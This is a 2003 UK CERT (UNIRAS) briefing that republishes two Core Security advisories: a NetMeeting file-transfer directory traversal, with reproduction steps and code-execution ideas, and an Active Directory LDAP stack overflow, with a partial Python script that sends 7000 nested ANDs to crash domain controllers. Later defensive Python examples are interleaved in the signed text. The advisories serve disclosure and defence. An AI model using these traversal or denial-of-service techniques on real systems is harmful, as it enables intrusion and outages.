
UNIRAS Brief - 379/03 - Two Core Security Advisories.



-----BEGIN PGP SIGNED MESSAGE-----

- ----------------------------------------------------------------------------------
   UNIRAS (UK Govt CERT) Briefing Notice - 379/03 dated 03.07.03  Time: 09:30
 UNIRAS is part of NISCC(National Infrastructure Security Co-ordination Centre)
- ----------------------------------------------------------------------------------
  UNIRAS material is also available from its website at www.uniras.gov.uk and
         Information about NISCC is available from www.niscc.gov.uk
- ----------------------------------------------------------------------------------

Title
=====

Two Core Security Advisories

1. NetMeeting Directory Traversal Vulnerability

2. Active Directory Stack Overflow


Detail
======

1. A directory traversal vulnerability was found in NetMeeting's file
transfer feature. An attacker can send a file whose name contains "..\..\"
and in this way create a file anywhere on the victim's filesystem,
escaping the directory where NetMeeting normally stores incoming files
(e.g. C:\Program Files\Received\Received Files).

2. A vulnerability in Active Directory allows an attacker to crash and force
a reboot of any Windows 2000 Server running the Active Directory service.

The vulnerability can be triggered when an LDAP version 3 search request
with more than 1000 "AND" statements is sent to the server, resulting in a
stack overflow and subsequent crash of the Lsass.exe service.



1.         ESB-2003.0460 -- Core Security Technologies Advisory
               NetMeeting Directory Traversal Vulnerability
                               03 July 2003


Product:                Windows NetMeeting
Publisher:              Core Security Technologies
Operating System:       Windows
Impact:                 Execute Arbitrary Code/Commands
                        Create Arbitrary Files
Access Required:        Remote

- - --------------------------BEGIN INCLUDED TEXT--------------------

                         Core Security Technologies Advisory
                             http://www.coresecurity.com

                     NetMeeting Directory Traversal Vulnerability



Date Published: 2003-07-02

Last Update: 2003-07-02

Advisory ID: CORE-2003-0305-04

Bugtraq ID: 7931

CVE Name: None currently assigned.

Title: NetMeeting Directory Traversal Vulnerability

Class: Input validation error

Remotely Exploitable: Yes

Locally Exploitable: No

Advisory URL:
  http://www.coresecurity.com/common/showdoc.php?idx=352&idxseccion=10

Vendors contacted:
  - Microsoft
    . Core Notification: 2003-05-21
    . Notification acknowledged by Microsoft: 2003-05-21
    . Issue fixed in Windows 2000 SP4: 2003-06-26

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

  Windows NetMeeting is a popular application used to hold audio and video
  conferences among a group of people. One of its features is "File
  Transfer", which lets you send one or more files in the background
  during a NetMeeting conference.

  A directory traversal vulnerability was found in NetMeeting's file
  transfer feature. An attacker can send a file whose name contains
  "..\..\" and in this way create a file anywhere on the victim's
  filesystem, escaping the directory where NetMeeting normally stores
  incoming files (e.g. C:\Program Files\Received\Received Files).

  This makes it possible to force the execution of arbitrary code on
  vulnerable systems.


*Vulnerable Packages:*

  NetMeeting version 3.01 (4.4.3385).
  Other versions may also be vulnerable.


*Solution/Vendor Information/Workaround:*

  A fix for this issue is included in Windows 2000 SP4 and Windows XP SP1
  available from:

  Windows 2000 Service Pack 4
  http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

  Windows XP (Professional and Home edition) Service Pack 1
  http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/

  Windows Server 2003 does not ship with a vulnerable version of NetMeeting.


*Credits:*

  This vulnerability was found by Hernán Ochoa, Gustavo Ajzenman, Javier
  Garcia Di Palma and Pablo Rubinstein from Core Security Technologies
  during Bugweek 2003 (March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

  We have found a directory traversal vulnerability in NetMeeting's file
  transfer feature. An attacker can send a file whose name contains
  "..\..\" and in this way create a file anywhere on the victim's
  filesystem, escaping the directory where NetMeeting normally stores
  incoming files (e.g. C:\Program Files\Received\Received Files). An
  attacker cannot overwrite files that already exist.

  A dialog box appears at the end of the file transfer, which can alert
  the user to the malicious action (the dialog box is not closed
  automatically). However, the user is not prompted to accept or reject
  the file transfer, and since NetMeeting conferences can be shut down by
  sending malformed packets (for example, by arbitrarily fuzzing the data
  in packets exchanged during a chat conversation), the action can be
  hidden from the user. We are also investigating a certain succession of
  packets that may prevent the dialog box from appearing at all.

  How to reproduce this vulnerability:

  - Start a NetMeeting conversation between two peers
  - Click on the "Transfer Files" button
  - Click on the "Add Files..." button and choose any file
    (e.g.: example_example_example.txt)
  - Attach a debugger to the NetMeeting process (conf.exe) and put a
    breakpoint on ws2_32!send
    (e.g.: ntsd -p <conf's pid> / bp send )
  - Click on the "Send All" button
  - The breakpoint set on ws2_32!send() will start being hit.
  - Examine the stack, and obtain the address of the buffer sent to the
    send() function, and examine its content
  - Look for the packet containing the name of the file being sent
    (e.g.: example_example_example.txt)
  - You're going to find two packets containing the filename, modify both
    packets with the debugger so that example_example_example.txt becomes
    ..\..\..\xample_example.txt
  - Let the process continue both times, and let the file transfer
    finish.
  - Now you can go to the root directory of the drive, and you'll see
    the file sent there instead of the "Received Files" directory.

  Of course, a debugger is not needed to exploit the vulnerability; it is
  just a convenient way to reproduce it.

  We also found that by sending malformed packets at several different
  moments during a connection, all participants or one specific
  participant can be thrown out of the conversation. This is not a big
  issue in itself, but it could help to hide malicious actions such as the
  one described above (one can send the file and, immediately afterwards,
  make the victim's NetMeeting drop the connection, which makes the file
  transfer dialog box disappear).

  This vulnerability allows an attacker to execute arbitrary code.
  For instance, she can upload a specially crafted DLL with the name of
  one of the DLLs used by NetMeeting into the NetMeeting directory.
  The next time NetMeeting is executed, the system will try to load
  these DLLs first from the current directory and then from
  C:\winnt\system32, so the attacker's DLL will be loaded and arbitrary
  code executed upon the next execution of NetMeeting.
  Another possibility is to upload an executable file into the
  startup directory of Win9x. That file will be executed the next
  time the user starts Win9x.
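The weakness described above is a receiver that appends the sender-supplied filename to its incoming-files directory without checking where the result lands. The following is an added example, not code from NetMeeting or from Core's advisory, that contrasts that naive behaviour with a hardened destination check. It uses Python's ntpath module so Windows path rules apply even when run elsewhere; the function names, the sample filenames and the drive-colon rejection are this example's own choices.

```python
import ntpath

# The incoming-files directory named in the advisory. Handled with ntpath so the
# Windows path semantics hold on any host running this example.
RECEIVE_DIR = r"C:\Program Files\Received\Received Files"


def naive_destination(receive_dir, remote_name):
    """Destination as a receiver that trusts the sender's name computes it: the
    name is appended to the receive directory as-is. A name containing "..\\..\\"
    walks out of the directory, and a rooted name replaces it entirely."""
    return ntpath.normpath(ntpath.join(receive_dir, remote_name))


def is_inside(receive_dir, candidate):
    """True if candidate, after normalisation, is receive_dir or lies below it.
    The comparison is case-insensitive, as on the Windows filesystems concerned."""
    base = ntpath.normcase(ntpath.normpath(receive_dir)).rstrip("\\")
    cand = ntpath.normcase(ntpath.normpath(candidate))
    return cand == base or cand.startswith(base + "\\")


def safe_destination(receive_dir, remote_name):
    """Hardened destination: keep only the final component of the sender-supplied
    name (either separator counts), reject names that are empty, '.', '..' or
    contain a colon (drive letter or NTFS stream syntax), then re-check that the
    result is still inside receive_dir. Raises ValueError on rejection."""
    leaf = remote_name.replace("/", "\\").rsplit("\\", 1)[-1]
    if leaf in ("", ".", "..") or ":" in leaf:
        raise ValueError("rejected sender-supplied filename: %r" % remote_name)
    dest = ntpath.normpath(ntpath.join(receive_dir, leaf))
    # Defence in depth: the leaf check already guarantees containment, but an
    # explicit check makes the invariant visible and survives later refactoring.
    if not is_inside(receive_dir, dest):
        raise ValueError("destination escapes receive directory: %r" % dest)
    return dest


def accepts(receive_dir, remote_name):
    """Convenience predicate: does the hardened check accept this name?"""
    try:
        safe_destination(receive_dir, remote_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample names: the advisory's traversal name, a rooted name and a benign one.
    for name in (r"..\..\..\xample_example.txt", r"\evil.dll", "report.txt"):
        naive = naive_destination(RECEIVE_DIR, name)
        print("%-32r naive -> %-45s inside=%s" % (name, naive, is_inside(RECEIVE_DIR, naive)))
        print("%-32r safe  -> %s" % (name, safe_destination(RECEIVE_DIR, name)))
```

Note that a safe name does not address the other behaviour the advisory records: existing files are never overwritten, and a dropped file still sits in the receive directory until the user deals with it. The containment check only guarantees that the receive directory is the only place a file can land.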


*About Core Security Technologies*

  Core Security Technologies develops strategic security solutions for
  Fortune 1000 corporations, government agencies and military
  organizations. The company offers information security software and
  services designed to assess risk and protect and manage information
  assets.

  Headquartered in Boston, MA, Core Security Technologies can be reached
  at 617-399-6980 or on the Web at http://www.coresecurity.com.

  To learn more about CORE IMPACT, the first comprehensive penetration
  testing framework, visit:
  http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

  The contents of this advisory are copyright (c) 2003 CORE Security
  Technologies and may be distributed freely provided that no fee is
  charged for this distribution and proper credit is given.

$Id: NetMeeting-advisory.txt,v 1.11 2003/07/02 15:45:46 carlos Exp $




2.          ESB-2003.0463 -- Core Security Technologies Advisory
                      Active Directory Stack Overflow
                               03 July 2003


Product:                Active Directory
Publisher:              Core Security Technologies
Operating System:       Windows
Impact:                 Denial of Service
Access Required:        Remote

- - --------------------------BEGIN INCLUDED TEXT--------------------

                         Core Security Technologies Advisory
                             http://www.coresecurity.com

                           Active Directory Stack Overflow


Date Published: 2003-07-02

Last Update: 2003-07-02

Advisory ID: CORE-2003-0305-03

Bugtraq ID: 7930

CVE Name: None currently assigned.

Title: Active Directory Stack Overflow

Class: Boundary Error Condition

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
  http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10

Vendors contacted:
  - Microsoft
    . Core Notification: 2003-05-16
    . Notification acknowledged by Microsoft: 2003-05-19
    . Issue fixed in Windows 2000 Service Pack 4: 2003-06-26

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

  Active Directory, which is an essential component of the Windows 2000
  architecture, presents organizations with a directory service designed
  for distributed computing environments. Active Directory allows organizations
  to centrally manage and share information on network resources and users
  while acting as the central authority for network security.

  The directory services provided by Active Directory are based on the
  Lightweight Directory Access Protocol (LDAP) and thus Active Directory
  objects can be stored and retrieved using the LDAP protocol.

  A vulnerability in Active Directory allows an attacker to crash and force
  a reboot of any Windows 2000 Server running the Active Directory service.

  The vulnerability can be triggered when an LDAP version 3 search request
  with more than 1000 "AND" statements is sent to the server, resulting in a
  stack overflow and subsequent crash of the Lsass.exe service.

  This, in turn, forces the domain controller to stop responding, making a
  denial of service attack against it possible. The LDAP request does not
  need to be authenticated.

  The possibility of exploiting this vulnerability to execute arbitrary code
  on a vulnerable server has not been proven, but has not been ruled out.


*Vulnerable Packages:*

  Windows 2000 Server with Active Directory (Service Pack 3).


*Solution/Vendor Information/Workaround:*

  This issue is fixed in Windows 2000 Service Pack 4, which can be
  downloaded from:
  http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

  Further information about the vulnerability can be obtained from
  http://support.microsoft.com/default.aspx?kbid=319709


*Credits:*

  This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo
  Quesada and Damian Saura from Core Security Technologies during Bugweek 2003
  (March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

  A 'search request' created using LDAP version 3 and constructed with more
  than 1000 "AND"s will provoke a stack overflow, causing the Lsass.exe
  service to crash and the machine to reboot within 30 seconds.

  To reproduce the stack overflow, you need to create a 'search request' to
  an Active Directory server. The 'search request' must search for a
  non-existent machine within the domain controller you have previously
  bound to.

  It must be composed of more than 1000 AND statements; OR, GE, LE and the
  other binary operators are expected to yield the same result.

  Example of a Python script that creates such a request:

- - ------------------------------------
class ActiveDirectoryDOS( Ldap ):
    # The Ldap base class (bindRequest, searchRequest, encapsulateHeader and the
    # LDAP_FILTER_* tag constants) and the asn1 module are not included in the advisory.

    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__(self)   # the base-class initialiser must receive the instance

    def generateFilter_BinaryOp( self, filter ):
        # one (attribute, value) assertion, encoded as two OCTET STRINGs under its filter tag
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
        filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
        return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
        # wrap the assertion in numTimes nested AND filters: each level contains the
        # previous level plus one more copy of the assertion, so nesting depth grows with numTimes
        simpleBinOp = self.generateFilter_BinaryOp( filter )
        filterBuffer = simpleBinOp
        for cnt in range( 0, numTimes ):
            filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
        return filterBuffer

    def searchSub( self, filterBuffer ):
        self.bindRequest()
        self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):
        # the machine must not exist
        machine_name = 'xaxax'
        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

        # execute the anonymous query
        print 'executing query'
        filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
        self.searchSub( filterBuffer )

- - ------------------------------------
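The crash the advisory describes is the classic outcome of a recursive filter decoder whose depth is controlled by the client. As an added example (not code from Core, Microsoft or any LDAP implementation), the block below shows the receiving side done safely: a BER walker that measures the nesting depth of an LDAP Filter with an explicit work stack and rejects the request once a configured limit is exceeded, before any recursive evaluation takes place. The tag values are the standard Filter CHOICE tags from RFC 4511; the small encoder, the `nested_and` builder used to construct the sample input, and the limit of 1000 are this example's own assumptions.

```python
# Tags of the LDAP Filter CHOICE (RFC 4511). AND, OR and NOT are the only alternatives
# whose contents are further Filters, so only they contribute to nesting depth.
FILTER_AND, FILTER_OR, FILTER_NOT = 0xA0, 0xA1, 0xA2
FILTER_EQUALITY = 0xA3
NESTING_FILTER_TAGS = {FILTER_AND, FILTER_OR, FILTER_NOT}
LEAF_FILTER_TAGS = {0xA3, 0xA4, 0xA5, 0xA6, 0x87, 0xA8, 0xA9}  # equality, substrings, >=, <=, present, approx, extensible
OCTET_STRING = 0x04


def ber_length(n):
    """Definite-form BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_length(len(payload)) + payload


def equality_filter(attr, value):
    """(attr=value) as an equalityMatch: attributeDesc and assertionValue OCTET STRINGs."""
    return tlv(FILTER_EQUALITY, tlv(OCTET_STRING, attr) + tlv(OCTET_STRING, value))


def nested_and(inner, levels):
    """Constructed sample input: wrap `inner` in `levels` nested AND filters, each level
    holding the previous level plus one more copy of `inner`, the shape the advisory describes."""
    f = inner
    for _ in range(levels):
        f = tlv(FILTER_AND, f + inner)
    return f


def read_tlv(buf, pos):
    """Decode one TLV header at pos; return (tag, value_start, value_end). Strict:
    single-byte tags, definite lengths only, no overrun of the buffer."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV")
    tag, first = buf[pos], buf[pos + 1]
    if tag & 0x1F == 0x1F:
        raise ValueError("multi-byte tag not expected in a Filter")
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4:
            raise ValueError("indefinite or oversized length")
        if pos + n > len(buf):
            raise ValueError("truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("length overruns buffer")
    return tag, pos, end


def filter_depth(buf, max_depth):
    """Return the nesting depth of the BER-encoded Filter in buf, walking it with an
    explicit work stack so the native call stack never depends on the input. Raises
    ValueError as soon as any node sits deeper than max_depth."""
    tag, start, end = read_tlv(buf, 0)
    if end != len(buf):
        raise ValueError("trailing bytes after Filter")
    work = [(tag, start, end, 1)]
    deepest = 0
    while work:
        tag, start, end, depth = work.pop()
        if depth > max_depth:
            raise ValueError("filter nesting %d exceeds limit %d" % (depth, max_depth))
        deepest = max(deepest, depth)
        if tag in NESTING_FILTER_TAGS:
            pos = start
            while pos < end:                      # every child of AND/OR/NOT is itself a Filter
                ctag, cstart, cend = read_tlv(buf, pos)
                work.append((ctag, cstart, cend, depth + 1))
                pos = cend
        elif tag not in LEAF_FILTER_TAGS:
            raise ValueError("unexpected tag 0x%02x in Filter" % tag)
    return deepest


def filter_acceptable(buf, max_depth=1000):
    """Gate a SearchRequest filter before handing it to a recursive evaluator."""
    try:
        filter_depth(buf, max_depth)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    leaf = equality_filter(b"name", b"xaxax")           # the advisory's non-existent machine
    for levels in (5, 999, 1500):
        sample = nested_and(leaf, levels)
        print("%5d nested ANDs, %6d bytes: accepted=%s" % (levels, len(sample), filter_acceptable(sample)))
```

The bounded walker is cheap (linear in the message size) and runs before any filter evaluation, so a request far past the limit costs the server one error response rather than a service crash. Whatever limit a deployment chooses, it should be well below the native stack budget of the component that later evaluates the filter recursively.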


*About Core Security Technologies*

  Core Security Technologies develops strategic security solutions for
  Fortune 1000 corporations, government agencies and military
  organizations. The company offers information security software and
  services designed to assess risk and protect and manage information
  assets.
  Headquartered in Boston, MA, Core Security Technologies can be reached
  at 617-399-6980 or on the Web at http://www.coresecurity.com.

  To learn more about CORE IMPACT, the first comprehensive penetration
  testing framework, visit:
  http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

  The contents of this advisory are copyright (c) 2003 CORE Security
  Technologies and may be distributed freely provided that no fee is
  charged for this distribution and proper credit is given.

$Id: ActiveDirectory-advisory.txt,v 1.9 2003/07/02 15:45:46 carlos Exp $




- ----------------------------------------------------------------------------------

For additional information or assistance, please contact the HELP Desk by
telephone or Not Protectively Marked information may be sent via EMail to:
uniras@xxxxxxxxxxxx

Office Hours:
Mon - Fri: 08:30 - 17:00 Hrs
Tel: +44 (0) 20 7821 1330 Ext 4511
Fax: +44 (0) 20 7821 1686

Outside of Office Hours:
On Call Duty Officer:
Tel: +44 (0) 20 7821 1330 and follow the prompts

- ----------------------------------------------------------------------------------
UNIRAS wishes to acknowledge the contributions of Coresecurity for the information
contained in this Briefing.
- ----------------------------------------------------------------------------------
This Briefing contains the information released by the original author. Some
of the information may have changed since it was released. If the vulnerability
affects you, it may be prudent to retrieve the advisory from the canonical site
to ensure that you receive the most current information concerning that problem.

Reference to any specific commercial product, process, or service by trade
name, trademark, manufacturer, or otherwise, does not constitute or imply
its endorsement, recommendation, or favouring by UNIRAS or NISCC.  The views
and opinions of authors expressed within this notice shall not be used for
advertising or product endorsement purposes.

Neither UNIRAS nor NISCC shall accept responsibility for any errors
or omissions contained within this briefing notice. In particular, they shall
not be liable for any loss or damage whatsoever, arising from or in connection
with the usage of information contained within this notice.

UNIRAS is a member of the Forum of Incident Response and Security Teams (FIRST)
and has contacts with other international Incident Response Teams (IRTs) in
order to foster cooperation and coordination in incident prevention, to prompt
rapid reaction to incidents, and to promote information sharing amongst its
members and the community at large.
- ----------------------------------------------------------------------------------
<End of UNIRAS Briefing>
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQCVAwUBPwPqropao72zK539AQGLPQP/c9609JWSGDcCAsQzwOg3gDjersPoQS+8
Oocl2SyNBuYo36c2G7s/xMc2EohRAgBX6iedEt2u2mM7U2oRVz4T2m0Bv23jSE2g
d+YYVzyLPCpVvg0F+/UoKMHFzeL+2hRrTy7LOjIUjGxCtiQ8rRmWOuZvpEHlq5jF
I3kUvFaXZwI=
=itkf
-----END PGP SIGNATURE-----